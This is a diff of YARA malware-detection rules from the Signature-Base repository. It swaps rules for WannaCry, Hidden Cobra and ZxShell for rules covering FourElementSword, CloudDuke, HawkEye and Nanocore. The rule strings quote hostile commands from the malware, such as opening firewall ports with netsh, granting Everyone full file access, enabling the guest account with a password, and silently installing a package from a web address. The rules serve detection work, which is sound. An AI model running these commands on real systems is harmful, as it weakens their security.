-		id = "bc139580-a55b-514f-8a4e-ca1402ce3ad9"
-		date = "2018-04-12"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3e1f6d8d-53ea-542f-ba49-39b4c86f3124"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L21-L41"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L139-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d52fc053afc6b3beb35a6dfd0f9b3714a5bad4e9b0dcfcce7be87d65f0a0c23e"
+		hash = "bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f"
+		logic_hash = "9658ae3d1267993551cfb939f75f3d78de18cbeb2f524c2576b849103f3cacdc"
 		score = 75
 		quality = 85
-		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
-		incident = "10135536"
-		category = "hidden_cobra"
-		family = "TYPEFRAME"
-		hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
-		$s1 = {B6 DF 01 FD 48 B5 }
-		$s2 = {B6 D5 0E F3 4E B5 }
-		$s3 = {B7 DF 0E EE }
-		$s4 = {B6 DF 03 FC }
-		$s5 = {A7 D3 03 FC }
+		$s1 = "\\Release\\BypassUAC.pdb" ascii
+		$s2 = "\\ResN32.dll" wide
+		$s3 = "Eupdate" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_NK_AR18_165A_Hiddencobra_Import_Deob : HIDDEN_COBRA TYPEFRAME FILE
+rule SIGNATURE_BASE_Fourelementsword_Elevatedll : FILE
 {
 	meta:
-		description = "Hidden Cobra - Detects installed proxy module as a service"
-		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
-		id = "f403d589-be35-57a7-9675-f92657c11acc"
-		date = "2018-04-12"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06879d75-18a3-5d49-a963-fa4bee379387"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L43-L60"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L158-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ae769e62fef4a1709c12c9046301aa5d"
-		hash = "e48fe20eblf5a5887f2ac631fed9ed63"
-		logic_hash = "2eff83738ca4f2db8327c1ee2a9539d7ce882a315025a656d391c16079e432cb"
+		logic_hash = "d110bae02f00d14c5a71ecf5991e9fc38b29d8056d1e551dc36376875d2e1333"
 		score = 75
 		quality = 85
-		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
-		incident = "10135536"
-		category = "hidden_cobra"
-		family = "TYPEFRAME"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9"
+		hash2 = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
 
 	strings:
-		$ = { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8}
-		$ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6}
+		$x1 = "Elevate.dll" fullword wide
+		$x2 = "ResN32.dll" fullword wide
+		$s1 = "Kingsoft\\Antivirus" fullword wide
+		$s2 = "KasperskyLab\\protected" fullword wide
+		$s3 = "Sophos" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) and all of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT_NK_AR18_165A_1 : FILE
+rule SIGNATURE_BASE_APT_UNC1151_Windowsinstaller_Silent_Installproduct_Macromethod : FILE
 {
 	meta:
-		description = "Detects APT malware from AR18-165A report by US CERT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "45f5205d-7f69-5646-aef8-f95d139f9720"
-		date = "2018-06-15"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Proofpoint Threat Research"
+		id = "9ae80d54-33b9-55d7-957f-0738243e089f"
+		date = "2021-07-28"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L62-L76"
+		reference = "Thttps://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc1151_ua.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b87c537c9ff38329a5e1e39d5ad1d6cef724c580f246721443eab603534b29d"
+		logic_hash = "aec1bb992061fdf1abf5c1a61cf9ec9e54c1f13be36ceb84890b058ade273b70"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359"
+		hash1 = "1561ece482c78a2d587b66c8eaf211e806ff438e506fcef8f14ae367db82d9b3"
+		hash2 = "a8fd0a5de66fa39056c0ddf2ec74ccd38b2ede147afa602aba00a3f0b55a88e0"
 
 	strings:
-		$s1 = "netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=%d action=allow enable=yes" fullword wide
-		$s2 = "netsh.exe firewall add portopening TCP %d \"PortOpenning\" enable" fullword wide
+		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
+		$s1 = ".UILevel = 2"
+		$s2 = "CreateObject(\"WindowsInstaller.Installer\")"
+		$s3 = ".InstallProduct \"http"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		$doc_header at 0 and all of ( $s* )
 }
-rule SIGNATURE_BASE_Wannacry_Ransomware : FILE
+rule SIGNATURE_BASE_Cloudduke_Malware : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware"
-		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
-		id = "2e46b4db-8c94-53ed-ae27-31dd37b04940"
-		date = "2017-05-12"
+		description = "Detects CloudDuke Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "902ef68b-7ed1-5622-b796-4e3bb2388124"
+		date = "2015-07-22"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L12-L46"
+		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudduke.yar#L10-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a652444d7946dbbc4fae76cd01f2e20993999fd1e6fc48a9ac0da57aab87a2da"
-		score = 75
-		quality = 83
+		logic_hash = "eaa159a99b6518db736adfd555bfcd052c2ae21b2e60a1db80b90459c47c90ab"
+		score = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+		hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
+		hash4 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
+		hash5 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+		hash6 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+		hash7 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
 
 	strings:
-		$x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
-		$x2 = "taskdl.exe" fullword ascii
-		$x3 = "tasksche.exe" fullword ascii
-		$x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii
-		$x5 = "WNcry@2ol7" fullword ascii
-		$x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii
-		$x7 = "mssecsvc.exe" fullword ascii
-		$x8 = "C:\\%s\\qeriuwjhrf" fullword ascii
-		$x9 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
-		$s1 = "C:\\%s\\%s" fullword ascii
-		$s2 = "<!-- Windows 10 --> " fullword ascii
-		$s3 = "cmd.exe /c \"%s\"" fullword ascii
-		$s4 = "msg/m_portuguese.wnry" fullword ascii
-		$s5 = "\\\\192.168.56.20\\IPC$" fullword wide
-		$s6 = "\\\\172.16.99.5\\IPC$" fullword wide
-		$op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 }
-		$op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 }
-		$op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 }
-		$op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c }
-		$op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 }
-		$op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 }
+		$s1 = "ProcDataWrap" fullword ascii
+		$s2 = "imagehlp.dll" fullword ascii
+		$s3 = "dnlibsh" fullword ascii
+		$s4 = "%ws_out%ws" fullword wide
+		$s5 = "Akernel32.dll" fullword wide
+		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
+		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
+		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) and 1 of ( $s* ) or 3 of ( $op* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 720KB and 4 of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_Wannacry_Ransomware_Gen : FILE
+rule SIGNATURE_BASE_SFXRAR_Acrotray : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware"
-		author = "Florian Roth (Nextron Systems) (based on rule by US CERT)"
-		id = "d28d3d76-9c24-5476-9a0c-936c17477d6a"
-		date = "2017-05-12"
+		description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1566fb75-d3a8-5e22-b05b-3a2f37374f31"
+		date = "2015-07-22"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L48-L66"
+		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudduke.yar#L42-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8f81c918dc1e2c8ef2e334ae504f88b10aef9e54a64486061d45296d2d738aab"
-		score = 75
+		logic_hash = "3b318ab2854eb7614dd1a42d3971a96d1d485d5cce552336ad3a7f39886ba710"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05"
-		hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df"
-		hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359"
+		super_rule = 1
+		hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
+		hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
+		hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
 
 	strings:
-		$s1 = "__TREEID__PLACEHOLDER__" ascii
-		$s2 = "__USERID__PLACEHOLDER__" ascii
-		$s3 = "Windows for Workgroups 3.1a" fullword ascii
-		$s4 = "PC NETWORK PROGRAM 1.0" fullword ascii
-		$s5 = "LANMAN1.0" fullword ascii
+		$s1 = "winrarsfxmappingfile.tmp" fullword wide
+		$s2 = "GETPASSWORD1" fullword wide
+		$s3 = "acrotray.exe" fullword ascii
+		$s4 = "CryptUnprotectMemory failed" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2449KB and all of them
 }
-rule SIGNATURE_BASE_Wanncry_M_Vbs : FILE
+rule SIGNATURE_BASE_Hawkeye_Keylogger_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware VBS"
+		description = "Semiautomatically generated YARA rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a8f13bd2-984d-5c8c-ac53-7d442e222850"
-		date = "2017-05-12"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L68-L83"
+		id = "6b4b447f-43d6-5774-a1b9-d53b40364732"
+		date = "2018-02-12"
+		modified = "2023-01-06"
+		reference = "https://app.any.run/tasks/ae2521dd-61aa-4bc7-b0d8-8c85ddcbfcc9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hawkeye.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4606834535b4cad2e0d4a9bf6519fc4d749422fa4920f91fed9147ccfdff090"
-		score = 75
+		logic_hash = "39037ccb90b747c098fbf5a504aee4a6a716901ff5841ae328ea40d06cc3fcfd"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"
+		hash1 = "bb58922ad8d4a638e9d26076183de27fb39ace68aa7f73adc0da513ab66dc6fa"
 
 	strings:
-		$x1 = ".TargetPath = \"C:\\@" ascii
-		$x2 = ".CreateShortcut(\"C:\\@" ascii
-		$s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii
+		$s1 = "UploadReportLogin.asmx" fullword wide
+		$s2 = "tmp.exe" fullword wide
+		$s3 = "%appdata%\\" wide
 
 	condition:
-		( uint16( 0 ) == 0x4553 and filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Wanncry_BAT : FILE
+rule SIGNATURE_BASE_MAL_Hawkeye_Keylogger_Gen_Dec18
 {
 	meta:
-		description = "Detects WannaCry Ransomware BATCH File"
+		description = "Detects HawkEye Keylogger Reborn"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0929f0de-28ac-5534-a6fd-7b131abda011"
-		date = "2017-05-12"
+		id = "1d06f364-a4e2-5632-ad3a-d53a8cddf072"
+		date = "2018-12-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L85-L101"
+		reference = "https://twitter.com/James_inthe_box/status/1072116224652324870"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hawkeye.yar#L20-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "472c6aa0f1b5229d639ef347ea39947d3fd292cda3c4086e29a19b64daad4f3f"
+		logic_hash = "b850f02849030d9912b7571e33e969427ac8f721d2f288ae3ac3e971c4ee4263"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"
+		tags = ""
+		hash1 = "b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad"
 
 	strings:
-		$s1 = "@.exe\">> m.vbs" ascii
-		$s2 = "cscript.exe //nologo m.vbs" fullword ascii
-		$s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii
-		$s4 = "echo om.Save>> m.vbs" fullword ascii
+		$s1 = "HawkEye Keylogger" fullword wide
+		$s2 = "_ScreenshotLogger" ascii
+		$s3 = "_PasswordStealer" ascii
 
 	condition:
-		( uint16( 0 ) == 0x6540 and filesize < 1KB and 1 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Wannacry_Ransomnote : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Gen_1 : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware Note"
+		description = "Detetcs the Nanocore RAT and similar malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65ce8faf-0981-5382-bc15-f094ccaa9f54"
-		date = "2017-05-12"
+		id = "b007e0ce-e64f-5027-95ff-d178383e3b59"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L103-L117"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L8-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da814848f4616166bd7b92fa1d55a54b565fa8e6036cb895e5795448e989a99d"
-		score = 75
+		logic_hash = "09fab3ef1b4ca9092fd69fb09c4ef759946fcb5b84161441bff797bb4009ed00"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"
+		hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"
 
 	strings:
-		$s1 = "A:  Don't worry about decryption." fullword ascii
-		$s2 = "Q:  What's wrong with my files?" fullword ascii
+		$x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii
+		$x2 = "RunPE1" fullword ascii
+		$x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii
+		$x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii
+		$x5 = "Monitorinjection" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3a51 and filesize < 2KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_APT_Lazaruswannacry : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Gen_2 : FILE
 {
 	meta:
-		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
-		author = "Costin G. Raiu, Kaspersky Lab"
-		id = "e9dd9750-2366-503a-a879-972dbead6bf3"
-		date = "2017-05-15"
+		description = "Detetcs the Nanocore RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "74124961-3b0e-5808-b495-90437d3a5999"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/neelmehta/status/864164081116225536"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L121-L147"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L28-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9c7c7149387a1c79679a87dd1ba755bc"
-		hash = "ac21c8ad899727137c4b94458d7aa8d8"
-		logic_hash = "8b32f1ea45a346088a18761540df3387997b53ea853f7a53cd292c9224f11209"
-		score = 75
+		logic_hash = "23b3d149012fb8395b7daa2ecaf3ee66fdeac352ac94d632d76e52df2c6e8ea6"
+		score = 100
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"
 
 	strings:
-		$a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
-         04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46
-         56 E8 }
-		$a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
-         10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
-         30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
-         38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
-         44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
-         68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
-         FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
-         08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
-         10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
-         2B C0 2C C0 FF FE }
+		$x1 = "NanoCore.ClientPluginHost" fullword ascii
+		$x2 = "IClientNetworkHost" fullword ascii
+		$x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 15000000 and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_1 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Sample_1 : FILE
 {
 	meta:
-		description = "Detects a ZxShell related sample from a CN threat group"
+		description = "Detetcs a certain Nanocore RAT sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a91e39bb-1bb3-54a8-b684-d673c445375c"
-		date = "2017-07-08"
+		id = "381d3caf-77de-544c-869c-4d9f0cae148f"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L12-L30"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L46-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30195ff91bd62e32784040f9ec2cf72db90ef1c75056abfd9740f35ce1baccd9"
+		logic_hash = "c74e5fe7e9d4dd7f032281b0e617f2355bc5844acf04a8ffbfd42165c7d9b8e4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef56c2609bc1b90f3e04745890235e6052a4be94e35e38b6f69b64fb17a7064e"
+		hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"
 
 	strings:
-		$x1 = "CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++" ascii
-		$x2 = "system\\cURRENTcONTROLSET\\sERVICES\\tERMSERVICE" fullword ascii
-		$x3 = "\\secivreS\\teSlortnoCtnerruC\\METSYS" ascii
-		$x4 = "system\\cURRENTCONTROLSET\\cONTROL\\tERMINAL sERVER" fullword ascii
-		$x5 = "sOFTWARE\\mICROSOFT\\iNTERNET eXPLORER\\mAIN" fullword ascii
-		$x6 = "eNABLEaDMINtsREMOTE" fullword ascii
+		$x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide
+		$x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii
+		$x3 = "popthatkitty.Resources.resources" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_2 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Sample_2 : FILE
 {
 	meta:
-		description = "Detects a ZxShell related sample from a CN threat group"
+		description = "Detetcs a certain Nanocore RAT sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37c1f26b-4b4f-510e-a7b7-b2afb17d6e71"
-		date = "2017-07-08"
+		id = "81f6771a-29a3-5fa0-8d24-ea717d3c5251"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L32-L58"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L64-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d7c9f2af3842d60cf4b0b64bdb687a32014b449b42b101394e0424c12fc2808e"
+		logic_hash = "505176b7320e95c652f0b6fdc6fadc3d16ff30115263862ba61209fa2fb82a2d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e"
+		hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"
 
 	strings:
-		$u1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$u2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$u3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
-		$u4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
-		$x1 = "\\\\%s\\admin$\\g1fd.exe" fullword ascii
-		$x2 = "C:\\g1fd.exe" fullword ascii
-		$x3 = "\\\\%s\\C$\\NewArean.exe" fullword ascii
-		$s0 = "at \\\\%s %d:%d %s" fullword ascii
-		$s1 = "%c%c%c%c%ccn.exe" fullword ascii
-		$s2 = "hra%u.dll" fullword ascii
-		$s3 = "Referer: http://%s:80/http://%s" fullword ascii
-		$s5 = "Accept-Language: zh-cn" fullword ascii
+		$s1 = "U4tSOtmpM" fullword ascii
+		$s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" wide
